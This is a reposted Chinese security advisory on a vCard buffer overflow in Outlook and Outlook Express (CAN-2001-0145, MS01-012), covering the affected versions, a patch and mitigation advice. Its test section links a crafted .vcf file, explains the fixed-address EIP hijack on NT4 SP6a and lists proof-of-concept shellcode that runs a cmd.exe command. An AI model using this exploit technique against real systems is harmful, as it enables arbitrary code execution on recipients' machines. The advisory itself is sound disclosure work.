Outlook和Outlook Express处理VCard时存在缓冲区…

2008-04-10 03:04:48来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Outlook和Outlook Express处理VCard时存在缓冲区溢出

发布日期:2001-03-01
更新日期:2001-03-01

受影响系统:

Microsoft Outlook 98
Microsoft Outlook 2000
Microsoft Outlook Express 5.x
描述:

CVE: CAN-2001-0145

Outlook Express提供的一些组件同时也被Outlook使用,其中一个用来处理vCard(虚拟
商业名片,Virtual Bussiness Card)的组件存在缓冲区溢出。

通过创建一个包含精心构造的数据的vCard并将其发送给其它用户,攻击者可以使接收者的
邮件客户端停止响应,或者以接收者的权限在其机器上执行任意代码。在前一种情况下,
接收者只要重启邮件客户端程序即可。

由于vCard是无法自动打开的,因此只有在接收者手动打开它的情况下或者不打开vCard而
只是将其拷贝到“联系人”目录时才会受本漏洞的影响。


<* 来源:Ollie Whitehouse (ollie@atstake.com)
http://www.atstake.com/research/advisories/2001/a022301-1.txt
Microsoft Security Bulletin(MS01-012)
*>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


将下面的文件存到本地硬盘中用资源管理器打开,或者作为附件发送并用Outlook 2000
接收后再打开:
http://www.atstake.com/research/advisories/2001/Outlook-NT4SP6a-BufferOverflow.vcf
它将会使Outlook 2000在C盘根目录下建立一个名为!outlook!的文件,文件内容是当前
工作目录下的文件列表。
上述示例文件只能用于Windows NT (SP6a),因为其中的代码在调用KERNEL32.DLL中的
函数时使用的是针对WinNT(SP6a)的固定地址,通过使EIP寄存器指向SP6a的KERNEL32.DLL
中的JMP EAX指令(机器码为FF E0,线性地址为77BB3923H)来执行选定的代码。要执
行的代码在上述示例文件的偏移地址00000445H处,如下:

<!--StartFragment-->|-----<Assembly Code Proof of concept>-----
[Byte Code] [Assembly]
55 push ebp
8B EC mov ebp,esp
33 F6 xor esi,esi
56 push esi
68 6F 6F 6B 21 push 216B6F6Fh
68 6F 75 74 6C push 6C74756Fh
68 63 3A 5C 21 push 215C3A63h
68 69 72 20 3E push 3E207269h
68 2F 63 20 64 push 6420632Fh
68 65 78 65 20 push 20657865h
68 63 6D 64 2E push 2E646D63h
56 push esi
8D 75 E0 lea esi,[ebp-20h]
56 push esi
B8 86 A9 F1 77 mov eax,77F1A986h
FF D0 call eax
B8 92 9F F1 77 mov eax,77F19F92h
FF D0 call eax
C3 ret
|-----<End of Code for Proof of concept>-----



建议:

临时解决办法:

NSFOCUS建议您不要打开邮件中可疑的附件。

厂商补丁:

微软已经发布了为此一个安全公告以及相关补丁。

微软安全公告(MS01-012):
http://www.microsoft.com/technet/security/bulletin/MS01-012.asp

补丁下载:

由于存在问题的组件是作为Outlook Express的一部分,而Outlook Express又是
作为IE的一部分发行的,所以该补丁以IE的版本进行区分。
http://www.microsoft.com/windows/ie/download/critical/q283908/default.asp


标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:htdig 泄漏web服务器文件路径

下一篇:Bay/Nortel Networks Nautica Marlin路由器远程拒绝服务攻击漏洞